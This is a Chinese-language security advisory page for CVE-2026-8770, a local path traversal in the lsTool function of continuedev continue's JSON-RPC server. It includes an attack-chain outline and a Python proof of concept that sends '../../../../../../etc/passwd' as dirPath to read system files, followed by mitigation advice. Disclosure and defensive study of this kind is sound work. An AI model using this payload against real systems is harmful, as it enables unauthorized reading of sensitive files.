IPBUF安全漏洞报告
English
CVE-2026-8770 CVSS 3.3 低危

CVE-2026-8770 continuedev continue路径遍历漏洞

披露日期: 2026-05-18
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-8770
漏洞类型
路径遍历
CVSS评分
3.3 低危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
continuedev continue

相关标签

路径遍历continuedevJSON-RPC本地攻击信息泄露

漏洞概述

Continuedev continue 1.2.22及更早版本中存在一个路径遍历漏洞。该漏洞位于JSON-RPC服务器组件的`lsTool`函数中,由于对用户输入的`dirPath`参数缺乏严格校验,导致本地低权限攻击者能够通过特殊构造的路径参数读取系统敏感文件。目前漏洞利用代码已公开,但供应商尚未响应。

技术细节

该漏洞源于continuedev continue软件项目的JSON-RPC服务器组件中,具体位于文件`core/tools/implementations/lsTool.ts`的`lsTool`函数。该函数旨在列出目录内容,但在处理传入的`dirPath`参数时,缺乏有效的安全边界检查和路径规范化机制。攻击者通过构造包含路径遍历序列(如`../`)的恶意参数,可以绕过应用程序预期的目录限制,进而访问服务器文件系统上的任意目录和文件。由于CVSS向量显示攻击向量为本地(AV:L)且需要低权限(PR:L),这通常意味着攻击者已经获得了系统上的初步访问权限(例如通过受限的shell或账户)。利用此漏洞,攻击者可以读取敏感配置文件、源代码或其他用户数据,从而为进一步的横向移动或权限提升提供信息支持。尽管漏洞利用代码已被公开,但厂商尚未发布修复补丁或做出回应,因此风险持续存在。

攻击链分析

STEP 1
步骤1
攻击者获取目标系统的本地低权限访问权限。
STEP 2
步骤2
识别continuedev continue软件开启的JSON-RPC服务端口(默认可能为4100)。
STEP 3
步骤3
构造包含路径遍历字符(如../)的JSON-RPC请求,目标方法为lsTool,参数dirPath设置为敏感文件路径。
STEP 4
步骤4
向目标服务器发送恶意请求。
STEP 5
步骤5
服务器未做校验直接处理请求,返回目标目录或文件的内容,导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests import json # Target URL (Example: localhost default port for JSON-RPC) # Note: Actual endpoint/port depends on the specific configuration of continuedev target_url = "http://127.0.0.1:4100/rpc" # JSON-RPC payload to exploit path traversal in lsTool payload = { "jsonrpc": "2.0", "method": "lsTool", # The vulnerable function "params": { # Manipulate dirPath to traverse directories (e.g., accessing /etc/passwd on Linux) # Using several '../' to escape the current working directory "dirPath": "../../../../../../etc/passwd" }, "id": 1 } try: headers = {'Content-Type': 'application/json'} response = requests.post(target_url, data=json.dumps(payload), headers=headers, timeout=5) if response.status_code == 200: result = response.json() print("Exploit successful! Response:") print(json.dumps(result, indent=2)) else: print(f"Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"An error occurred: {e}")

影响范围

continuedev continue <= 1.2.22

防御指南

临时缓解措施
建议立即禁用受影响版本中的JSON-RPC服务组件,或者在系统层面限制对相关端口的本地访问权限,直到官方发布并应用安全补丁。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表